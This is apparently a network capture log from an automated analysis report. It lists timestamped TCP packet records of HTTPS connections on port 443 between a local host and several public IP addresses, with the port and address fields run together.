                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.514509916 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.514537096 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.514564991 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.514583111 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.514588118 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.514592886 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.514621973 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.514672041 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.514708996 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.517029047 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.517091990 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.535976887 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.536047935 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.536063910 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.536076069 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.536111116 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558530092 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558587074 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558624983 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558636904 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558670044 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558711052 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558717012 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558727980 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558773041 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558794975 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558850050 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558888912 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.558897018 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.559447050 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.559490919 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.559967995 CEST49734443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.559979916 CEST44349734104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.576078892 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.605003119 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.605035067 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.605067015 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.605093956 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.605127096 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.621028900 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.621066093 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.621274948 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.621301889 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.621385098 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.638365984 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.638413906 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.638448954 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.638475895 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.638490915 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.687655926 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.689591885 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.689618111 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.689646006 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.689675093 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.689714909 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.704307079 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.704332113 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.704423904 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.704447031 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.715186119 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.715215921 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.715270042 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.715301991 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.715317965 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.728507996 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.728533030 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.728595972 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.728609085 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.728657007 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.740334034 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.740360975 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.740467072 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.740483999 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.747133017 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.747198105 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.747210026 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.747221947 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.747276068 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.748748064 CEST49731443192.168.2.1699.86.229.114
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.748765945 CEST4434973199.86.229.114192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.787967920 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.788057089 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.789943933 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.789951086 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.790231943 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.845657110 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.939876080 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.982451916 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.983104944 CEST49707443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.983191967 CEST49707443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.983551025 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.983597040 CEST4434973923.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.983669996 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.984014988 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.984029055 CEST4434973923.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.142741919 CEST4434970723.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.142759085 CEST4434970723.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201225042 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201260090 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201272964 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201280117 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201296091 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201304913 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201328039 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201356888 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201373100 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201380968 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201399088 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201404095 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201423883 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201441050 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201446056 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201457024 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.201495886 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.310977936 CEST4434973923.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.311117887 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.334302902 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.334316969 CEST4434973923.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.335314989 CEST4434973923.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.335395098 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.335861921 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.335917950 CEST4434973923.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.336074114 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.378453016 CEST4434973923.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.576572895 CEST49742443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.576602936 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.576659918 CEST49742443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.577018976 CEST49742443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.577032089 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.609421968 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.609450102 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.609471083 CEST49735443192.168.2.1613.85.23.86
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.609477997 CEST4434973513.85.23.86192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.711487055 CEST4434973923.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.711571932 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.711688995 CEST4434973923.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.711735010 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.711822033 CEST4434973923.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.711869001 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.773552895 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.773760080 CEST49742443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.773771048 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.774816990 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.774872065 CEST49742443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.775990009 CEST49742443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.776063919 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.776145935 CEST49742443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.776154041 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.819638968 CEST49742443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.954972029 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.955091953 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.955127001 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.955152988 CEST49742443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.955172062 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.955212116 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.955215931 CEST49742443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.955260038 CEST49742443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.998075962 CEST49742443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.998102903 CEST44349742157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.015707016 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.015739918 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.015793085 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.016098976 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.016113997 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.035676003 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.035706043 CEST4434973923.1.237.25192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.035718918 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.035758018 CEST49739443192.168.2.1623.1.237.25
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.152259111 CEST49749443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.152298927 CEST4434974963.140.38.180192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.152364969 CEST49749443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.154874086 CEST49749443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.154886007 CEST4434974963.140.38.180192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.208688021 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.208992958 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.209031105 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.209391117 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.209769964 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.209842920 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.209937096 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.250485897 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.356501102 CEST4434974963.140.38.180192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.356950998 CEST49749443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.356969118 CEST4434974963.140.38.180192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.358109951 CEST4434974963.140.38.180192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.358181953 CEST49749443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.359318972 CEST49749443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.359388113 CEST4434974963.140.38.180192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.359493971 CEST49749443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.359502077 CEST4434974963.140.38.180192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.401664972 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.401710987 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.401824951 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.401854038 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.408679962 CEST49749443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.427381039 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.427403927 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.427565098 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.427592993 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.427659988 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.530288935 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.530322075 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.530438900 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.530467987 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.530493975 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.530524969 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.571476936 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.571496010 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.571605921 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.571633101 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.571744919 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.582947969 CEST4434974963.140.38.180192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.611407042 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.611452103 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.611483097 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.611517906 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.611547947 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.611569881 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.632690907 CEST49749443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.632703066 CEST4434974963.140.38.180192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.634387970 CEST49749443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.634453058 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.634473085 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.634501934 CEST4434974963.140.38.180192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.634536982 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.634558916 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.634624958 CEST49749443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.634675980 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.634675980 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.635293007 CEST49752443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.635325909 CEST4434975263.140.38.180192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.635405064 CEST49752443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.635855913 CEST49752443192.168.2.1663.140.38.180
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.635869980 CEST4434975263.140.38.180192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.663408041 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.663480997 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.663533926 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.663554907 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.663589001 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.663635015 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.685856104 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.685893059 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.685940981 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.685959101 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.685993910 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.686017036 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.700716019 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.700786114 CEST44349747157.240.229.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.700866938 CEST49747443192.168.2.16157.240.229.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.700892925 CEST44349747157.240.229.1192.168.2.16
